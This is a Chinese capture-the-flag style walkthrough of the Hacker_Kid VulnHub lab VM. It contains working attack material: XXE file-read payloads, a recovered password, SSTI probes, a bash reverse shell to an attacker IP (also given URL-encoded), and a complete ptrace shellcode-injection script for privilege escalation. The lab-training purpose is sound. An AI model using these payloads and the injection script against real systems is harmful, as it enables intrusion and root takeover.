Hacker_Kid-v1.0.1靶场

一、靶场介绍

1.下载地址：https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova
2.将靶机网络适配器改为NAT模式
3.启动靶机

二、信息收集

1、主机发现

nmap -sn 192.168.111.1/24

2.端口扫描

3.目录扫描

dirsearch -u 192.168.111.135 -e *

4.网页访问

三、渗透流程

1.网页三个按钮，后两个会显示当前页面


2.发现url后都带了#，尝试删掉访问，发现并无可利用的功能点


3.查看网页源代码，寻找突破点

4.尝试加上page_no

5.根据提示，尝试使用BP爆破



6.发现21有点不一样，尝试访问

7.提示有一个hackers.blackhat.local域，使用dig将hackers.blackhat.local解析到192.168.2.174

dig axfr @192.168.111.135 blackhat.local

8.将找到的域名都添加到C:\Windows\System32\drivers\etc\hosts文件中,访问http://hackerkid.blackhat.local./发现一个注册页面

9.尝试注册，一直提示邮箱不合法

10.抓包查看一下，发现信息都是通过XML传输的

11.加入实体引用尝试

<!DOCTYPE foo [<!ENTITY  txt  SYSTEM   "file:///etc/passwd"  >]> 

尝试读取.bashrc文件

<!DOCTYPE root [<!ENTITY test SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>

12.对返回的数据进行解码，得到有用信息

username="admin"
password="Saket!#$%@!!"

13.访问网页9999端口，尝试登录，发生错误

14.使用同样有/bin/bash权限的saket用户登录

15.根据提示，加入name参数尝试

16.尝试payload，存在注入漏洞

?name={${1+zjxxxy},{{7-1}}
?name={{1+zjxxxy}}${1+zjxxxy}<%1+zjxxxy%>[zjxxxy]

17.反弹shell，将语句进行url编码

编码前：{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.111.129/7777 0>&1"')}}
编码后：%7b%25%20%69%6d%70%6f%72%74%20%6f%73%20%25%7d%7b%7b%6f%73%2e%73%79%73%74%65%6d%28%27%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%31%31%2e%31%32%39%2f%37%37%37%37%20%30%3e%26%31%22%27%29%7d%7d

浏览器访问：

18.Kali开启监听

19.查询具有capabilities权限的文件

/usr/sbin/getcap -r / 2>/dev/null

20.利用提权脚本，kali生成py文件

# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c 
 
import ctypes
import sys
import struct
 
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
 
PTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17
 
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
 
class user_regs_struct(ctypes.Structure):
    _fields_ = [
        ("r15", ctypes.c_ulonglong),
        ("r14", ctypes.c_ulonglong),
        ("r13", ctypes.c_ulonglong),
        ("r12", ctypes.c_ulonglong),
        ("rbp", ctypes.c_ulonglong),
        ("rbx", ctypes.c_ulonglong),
        ("r11", ctypes.c_ulonglong),
        ("r10", ctypes.c_ulonglong),
        ("r9", ctypes.c_ulonglong),
        ("r8", ctypes.c_ulonglong),
        ("rax", ctypes.c_ulonglong),
        ("rcx", ctypes.c_ulonglong),
        ("rdx", ctypes.c_ulonglong),
        ("rsi", ctypes.c_ulonglong),
        ("rdi", ctypes.c_ulonglong),
        ("orig_rax", ctypes.c_ulonglong),
        ("rip", ctypes.c_ulonglong),
        ("cs", ctypes.c_ulonglong),
        ("eflags", ctypes.c_ulonglong),
        ("rsp", ctypes.c_ulonglong),
        ("ss", ctypes.c_ulonglong),
        ("fs_base", ctypes.c_ulonglong),
        ("gs_base", ctypes.c_ulonglong),
        ("ds", ctypes.c_ulonglong),
        ("es", ctypes.c_ulonglong),
        ("fs", ctypes.c_ulonglong),
        ("gs", ctypes.c_ulonglong),
    ]
    
    libc = ctypes.CDLL("libc.so.6")
    
    pid=int(sys.argv[1])
    
    # Define argument type and respone type.
    libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
    libc.ptrace.restype = ctypes.c_uint64
    
    # Attach to the process
    libc.ptrace(PTRACE_ATTACH, pid, None, None)
    registers=user_regs_struct()
    
    # Retrieve the value stored in registers
    libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
    
    print("Instruction Pointer: " + hex(registers.rip))
    
    print("Injecting Shellcode at: " + hex(registers.rip))
    
    # Shell code copied from exploit db.
    shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
    
    # Inject the shellcode into the running process byte by byte.
    for i in xrange(0,len(shellcode),4):
        
        # Convert the byte to little endian.
        shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
        shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
        shellcode_byte=int(shellcode_byte_little_endian,16)
        
        # Inject the byte.
        libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
        
        print("Shellcode Injected!!")
        
        # Modify the instuction pointer
        registers.rip=registers.rip+2
        
        # Set the registers
        libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
        
        print("Final Instruction Pointer: " + hex(registers.rip))
        
        # Detach from the process.
        libc.ptrace(PTRACE_DETACH, pid, None, None)

21.Kali开启http服务，靶机下载123.py文件


22.使用脚本对root进程进行批量尝试，执行成功，5600端口已被开启

for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 123.py $i; done

23.使用kali连接5600端口，成功提权

nc 192.168.111.135 5600